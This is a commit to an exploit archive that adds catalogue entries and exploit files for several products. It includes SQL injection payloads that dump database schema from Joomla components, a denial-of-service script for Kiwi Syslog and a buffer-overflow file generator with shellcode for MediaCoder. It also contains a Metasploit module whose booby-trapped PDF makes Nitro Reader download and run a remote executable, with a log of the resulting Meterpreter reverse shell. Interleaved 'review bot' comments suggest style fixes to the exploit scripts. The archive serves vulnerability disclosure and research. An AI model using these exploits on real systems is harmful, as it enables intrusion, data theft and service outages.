DB: 2017-08-03
9 new exploits Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit) Entrepreneur B2B Script - 'pid' Parameter SQL Injection Joomla! Component SIMGenealogy 2.1.5 - SQL Injection Joomla! Component PHP-Bridge 1.2.3 - SQL Injection Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection
This commit is contained in:
parent
baeaf13b13
commit
a600aa05cd
10 changed files with 419 additions and 0 deletions
|
@ -5635,6 +5635,7 @@ id,file,description,date,author,platform,type,port
|
|||
42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
|
||||
42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
|
||||
42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
|
||||
42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9124,6 +9125,7 @@ id,file,description,date,author,platform,type,port
|
|||
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
||||
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
|
||||
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
|
||||
41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
|
||||
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
|
||||
41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
|
||||
41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
|
||||
|
@ -9166,6 +9168,7 @@ id,file,description,date,author,platform,type,port
|
|||
42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
|
||||
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
|
||||
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
|
||||
42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38210,3 +38213,9 @@ id,file,description,date,author,platform,type,port
|
|||
42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
|
||||
42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
|
||||
42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
|
||||
42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
|
||||
42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
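--- /dev/null
+++ b/platforms/php/webapps/42412.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection
+# Date: 2017-08-02
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://readymadeb2bscript.com/
+# Version: All Version
+
+
+Exploit :
+http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]
+
+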
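--- /dev/null
+++ b/platforms/php/webapps/42413.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : https://www.simbunch.com/
+# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
+# Demo: https://www.simbunch.com/demos/simgenealogy
+# Version: 2.1.5
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
+# Etc..
+# # # # #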
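--- /dev/null
+++ b/platforms/php/webapps/42414.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://www.henryschorradt.de/
+# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
+# Demo: http://www.henryschorradt.de/joomla-php-bridge/
+# Version: 1.2.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
+# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
+# Etc..
+# # # # #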
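--- /dev/null
+++ b/platforms/php/webapps/42415.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://king-products.net/
+# Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
+# Demo: http://demo.king-products.net/
+# Version: 3.2.4.0
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
+# Etc..
+# # # # #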
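--- /dev/null
+++ b/platforms/php/webapps/42416.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://joomlashowroom.com/
+# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
+# Demo: http://demo3.joomlashowroom.com/
+# Version: 4.1.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
+# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
+# Etc..
+# # # # #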
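--- /dev/null
+++ b/platforms/php/webapps/42417.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://faboba.com/
+# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
+# Demo: http://demoupl.faboba.com/
+# Version: 1.0.2
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
+# -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
+# Etc..
+# # # # #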
55
platforms/windows/dos/42411.py
Executable file
55
platforms/windows/dos/42411.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
|
||||
# Date: 26/05/2017
|
||||
# Exploit Author: Guillaume Kaddouch
|
||||
# Twitter: @gkweb76
|
||||
# Blog: https://networkfilter.blogspot.com
|
||||
# GitHub: https://github.com/gkweb76/exploits
|
||||
# Vendor Homepage: http://www.solarwinds.com/
|
||||
# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
|
||||
# Version: 9.6.1.6
|
||||
# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
|
||||
# Category: DoS
|
||||
|
||||
"""
|
||||
Disclosure Timeline:
|
||||
--------------------
|
||||
2017-05-20: Vulnerability discovered
|
||||
2017-05-26: Vendor contacted
|
||||
2017-05-31: Vendor answered (technical support)
|
||||
2017-05-31: Vendor contacted (no answer)
|
||||
2017-08-01: Exploit published
|
||||
|
||||
|
||||
Description :
|
||||
-------------
|
||||
A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
|
||||
Apparently any data sent to it make it crash because of a Type Mismatch error.
|
||||
The syslog TCP listener is disabled by default.
|
||||
|
||||
|
||||
Instructions:
|
||||
-------------
|
||||
- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
|
||||
- Run this exploit locally or from your remote attacking machine.
|
||||
"""
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket
|
||||
|
||||
host = "10.0.0.56"
|
||||
port = 1468
|
||||
|
||||
buffer = "crash please?"
|
||||
|
||||
try:
|
||||
print "[*] Connecting to %s:%d" % (host, port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
|
||||
print "[*] Sending buffer... (%d bytes)" % len(buffer)
|
||||
s.send(buffer)
|
||||
s.close()
|
||||
|
||||
print "[*] Done."
|
||||
except:
|
||||
print "[-] Error connecting"
|
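Review bot: The `#!/usr/bin/python` shebang only takes effect as the first line of the file, but here it sits after the header comments and the docstring (roughly line 36 of the new file), so the script is runnable only through an explicit interpreter; move it to line 1. The bare `except:` around the whole connect/send sequence swallows every exception, including `KeyboardInterrupt`, and reports `"[-] Error connecting"` even when it is `send()` that failed; narrow it to `except socket.error as e:` and print `e`, and close the socket in a `finally:` so the descriptor is not leaked on a failed send. `buffer` also shadows the Python 2 builtin of the same name; `data` would read better.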
45
platforms/windows/local/41971.py
Executable file
45
platforms/windows/local/41971.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
|
||||
# Date : 2017-05-08
|
||||
# Exploit Author : Muhann4d
|
||||
# Vendor Homepage : http://www.mediacoderhq.com
|
||||
# Software Link : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
|
||||
# Tested Version : 0.8.48.5888
|
||||
# Category : Local Buffer Overflow
|
||||
# Tested on OS : Windows 7 Professional SP1 32bit
|
||||
|
||||
|
||||
print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d"
|
||||
from struct import pack
|
||||
|
||||
junk = "http://" + "\x41" * 361
|
||||
nseh = pack('<I',0x909006eb)
|
||||
seh = pack('<I',0x66017187)
|
||||
nops= "\x90" * 20
|
||||
shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
|
||||
"\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
|
||||
"\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
|
||||
"\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
|
||||
"\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
|
||||
"\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
|
||||
"\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
|
||||
"\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
|
||||
"\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
|
||||
"\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
|
||||
"\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
|
||||
"\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
|
||||
"\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
|
||||
"\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
|
||||
"\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
|
||||
|
||||
junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
|
||||
exploit = junk + nseh + seh + nops + shell + junkD
|
||||
|
||||
try:
|
||||
file= open("Exploit.m3u",'w')
|
||||
file.write(exploit)
|
||||
file.close()
|
||||
raw_input("\nExploit has been created!\n")
|
||||
except:
|
||||
print "There has been an Error"
|
||||
|
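Review bot: The `try:` block near the end leaks the file handle when `write()` raises, because `file.close()` is only reached on success, and the bare `except:` then hides which step failed; a context manager covers both: `with open("Exploit.m3u", 'w') as out:` / `out.write(exploit)`, with the handler narrowed to `except IOError as e:` so the message can include `e`. `file` also shadows the Python 2 builtin. The `from struct import pack` import placed after the first `print` belongs at the top of the file, directly under the shebang and header comments.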
219
platforms/windows/local/42418.rb
Executable file
219
platforms/windows/local/42418.rb
Executable file
|
@ -0,0 +1,219 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
|
||||
PDF Reader version 11. The saveAs() Javascript API function allows for writing
|
||||
arbitrary files to the file system. Additionally, the launchURL() function allows
|
||||
an attacker to execute local files on the file system and bypass the security dialog
|
||||
|
||||
Note: This is 100% reliable.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
|
||||
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
|
||||
'sinn3r' # help with msf foo!
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-7442' ],
|
||||
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
|
||||
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => false
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 24 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
deregister_options('SSL', 'SSLVersion', 'SSLCert')
|
||||
end
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
vbs = %Q|<head><hta:application
|
||||
applicationname="#{@payload_name}"
|
||||
border="none"
|
||||
borderstyle="normal"
|
||||
caption="false"
|
||||
contextmenu="false"
|
||||
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
|
||||
maximizebutton="false"
|
||||
minimizebutton="false"
|
||||
navigable="false"
|
||||
scroll="false"
|
||||
selection="false"
|
||||
showintaskbar="No"
|
||||
sysmenu="false"
|
||||
version="1.0"
|
||||
windowstate="Minimize"></head>
|
||||
<style>* { visibility: hidden; }</style>
|
||||
<script language="VBScript">
|
||||
window.resizeTo 1,1
|
||||
window.moveTo -2000,-2000
|
||||
</script>
|
||||
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
|
||||
<script language="VBScript">
|
||||
On Error Resume Next
|
||||
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
||||
#{name_xmlhttp}.open "GET","http://#{url}",False
|
||||
#{name_xmlhttp}.send
|
||||
Set #{name_adodb} = CreateObject("ADODB.Stream")
|
||||
#{name_adodb}.Open
|
||||
#{name_adodb}.Type=1
|
||||
#{name_adodb}.Write #{name_xmlhttp}.responseBody
|
||||
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
|
||||
set shellobj = CreateObject("wscript.shell")
|
||||
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
|
||||
</script>|
|
||||
vbs.gsub!(/ /,'')
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending second stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "/Windows/Temp"
|
||||
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
pdf = %Q|%PDF-1.7
|
||||
4 0 obj
|
||||
<<
|
||||
/Length 0
|
||||
>>
|
||||
stream
|
||||
|
|
||||
pdf << build_vbs(payload_src, stager_name)
|
||||
pdf << %Q|
|
||||
endstream endobj
|
||||
5 0 obj
|
||||
<<
|
||||
/Type /Page
|
||||
/Parent 2 0 R
|
||||
/Contents 4 0 R
|
||||
>>
|
||||
endobj
|
||||
1 0 obj
|
||||
<<
|
||||
/Type /Catalog
|
||||
/Pages 2 0 R
|
||||
/OpenAction [ 5 0 R /Fit ]
|
||||
/Names <<
|
||||
/JavaScript <<
|
||||
/Names [ (EmbeddedJS)
|
||||
<<
|
||||
/S /JavaScript
|
||||
/JS (
|
||||
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
)
|
||||
>>
|
||||
]
|
||||
>>
|
||||
>>
|
||||
>>
|
||||
endobj
|
||||
2 0 obj
|
||||
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
|
||||
endobj
|
||||
3 0 obj
|
||||
<<>>
|
||||
endobj
|
||||
xref
|
||||
0 6
|
||||
0000000000 65535 f
|
||||
0000000166 00000 n
|
||||
0000000244 00000 n
|
||||
0000000305 00000 n
|
||||
0000000009 00000 n
|
||||
0000000058 00000 n
|
||||
trailer <<
|
||||
/Size 6
|
||||
/Root 1 0 R
|
||||
>>
|
||||
startxref
|
||||
327
|
||||
%%EOF|
|
||||
pdf.gsub!(/ /,'')
|
||||
file_create(pdf)
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
|
||||
[*] Processing scripts/nitro.rc for ERB directives.
|
||||
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
|
||||
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
|
||||
LHOST => 172.16.175.1
|
||||
resource (scripts/nitro.rc)> exploit
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.175.1:4444
|
||||
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
|
||||
[*] Using URL: http://0.0.0.0:8080/
|
||||
[*] Local IP: http://192.168.100.4:8080/
|
||||
[*] Server started.
|
||||
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
|
||||
[*] Sending stage (957487 bytes) to 172.16.175.232
|
||||
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
|
||||
[+] Deleted C:/Windows/Temp/UOIr.hta
|
||||
|
||||
msf exploit(nitro_reader_jsapi) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > shell
|
||||
Process 2412 created.
|
||||
Channel 2 created.
|
||||
Microsoft Windows [Version 6.1.7601]
|
||||
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Users\researcher\Desktop>
|
||||
=end
|